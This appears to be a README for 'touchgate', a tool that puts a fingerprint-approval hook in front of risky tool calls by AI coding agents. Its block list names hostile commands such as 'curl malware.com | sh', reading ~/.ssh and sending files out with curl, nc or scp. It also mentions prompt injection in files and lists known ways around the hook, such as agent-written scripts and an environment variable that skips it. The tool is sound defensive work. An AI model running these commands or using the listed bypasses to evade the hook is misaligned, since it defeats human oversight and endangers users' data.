fingerprint approval for risky ai agent actions
if your agent wants to rm -rf ~/Projects, force push something, read ~/.ssh or run curl malware.com | sh. touchgate pauses it and asks for your fingerprint first. touch the sensor and it goes through, do nothing and it gets blockedd.
works with claude code, codex and gemini cli. uses fprintd on linux, touch id on macos and windows hello on windows
agents run with your permissions. --dangerously-skip-permissions and auto modes are great until the one command you didnt go over. if theres a prompt injection inside a file and your agent feels like executing it, ittl be blocked
touchgate puts its hook and its rules in your agents' managed config, the admin level files that user and project settings cant override, and those files are owned by root.
yay -S touchgate-git
# or
paru -S touchgate-gitthen
sudo touchgate install
touchgate doctorcargo install --git https://github.com/iamanuclearwarhead/touchgate
sudo touchgate install
touchgate doctoron windows run touchgate install from an admin terminal (pure slop btw)
you need a fingerprint reader with at least one finger enrolled.
touchgate install gate every supported agent (sudo)
touchgate install --lock also block hooks added outside managed config
touchgate doctor check the reader, the install and known bypasses
touchgate test rm -rf build what would happen with this command
touchgate test --read .env or with a file, --write, --fetch, --mcp
touchgate test --verify ... same but actually ask for the fingerprint
touchgate log recent touches and denials
touchgate uninstall take the hooks back out (sudo)
out of the box:
- deleting stuff,
rm -r,rm -f,find -delete,shred sudo,doas,pkexecand friends- git history rewrites, force push,
reset --hard,clean -f,branch -D - disks,
dd of=,mkfs,fdisk, mounts - publishing,
npm publish,cargo publish,docker push,gh release - live infra,
kubectl delete,terraform apply, cloud clis - databases,
DROP TABLE,FLUSHALL,db:drop - secrets,
~/.ssh,~/.aws,.env, keys, browser profiles, password stores - startup files,
~/.bashrc, autostart, systemd units, git hooks - the agent's own settings files
- sending files out,
curl -F @file,nc,scpto a remote - mcp tools that delete, send, merge, publish or pay
- anything it cant read:
curl | sh,eval "$x", base64 into bash,python -cthat shells out
commands are parsed properly, so ls && rm -rf x, $(rm -rf x), bash -c '...', sudo env nohup rm -rf x, xargs rm and find -exec rm all get caught
writes to touchgate's own config and the managed agent configs are always denied
/etc/touchgate/policy.toml (macos /Library/Application Support/touchgate/, windows %ProgramData%\touchgate\) is yours. its rules run before the built in ones, first match wins
timeout = 45
[[rule]]
name = "build-dirs"
tool = ["shell"]
command = ['^rm -rf (target|dist|node_modules)$']
action = "allow"
[[rule]]
name = "prod"
tool = ["shell"]
command = ['--context[= ]prod']
action = "deny"tool:shell,read,write,fetch,mcp,other- matchers:
command(regex on each command),path(globs,~works),url(regex),tool_name(globs),flag(obfuscated,dynamic-command,shell-from-stdin,inline-code-exec,unparsed) action:allow,touchordenybuiltin = falsedrops the built in rules,default = "touch"makes unmatched things need a touch too
~/.config/touchgate/policy.toml works the same but can only make things stricter, allow rules there are ignored
touchgate install adds a pre tool hook to
- claude code
/etc/claude-code/managed-settings.json - codex
/etc/codex/requirements.toml - gemini cli
/etc/gemini-cli/settings.json
(or the macos and windows equivalents) and copies itself to /usr/local/bin. every tool call goes through touchgate hook, which parses it, checks the rules and either lets it pass, asks for a finger, or denies it with a reason the agent can read. if anything goes wrong, bad input, broken rules, a crash, it denies
existing files are merged, not replaced, and a .touchgate-backup copy is kept
this is a speed bump with a fingerprint, not a sandbox
- it only sees what goes through the agent's tool calls. a script the agent writes and then runs with an innocent looking command is not inspected
- passwordless sudo lets anything undo it,
touchgate doctorwarns you - gemini cli reads
GEMINI_CLI_SYSTEM_SETTINGS_PATHfrom your env, if thats set the managed hook is skipped. doctor checks for it - regexes miss things. if you find a bypass, open an issue
for real isolation run agents in a container or vm, and use touchgate on top
- linux with fprintd: tested on a real reader
- claude code: tested live, touch lets it through, no touch blocks it
- gemini cli: tested live, hook fires and blocks, approve path next
- codex: hook format from its docs and binary, live test next
- macos touch id and windows hello: build, not tested on hardware yet
if you try it anywhere, tell me how it went in #1
- the hook gives you 45 seconds to touch, change it with
timeout(max 80, agents kill hooks that take too long) - fprintd can only be used by one thing at a time, if your lock screen or another prompt has the reader, touchgate denies
- the decision log lives in
~/.local/state/touchgate/audit.jsonl
mit or apache-2.0, see LICENSE-MIT and LICENSE-APACHE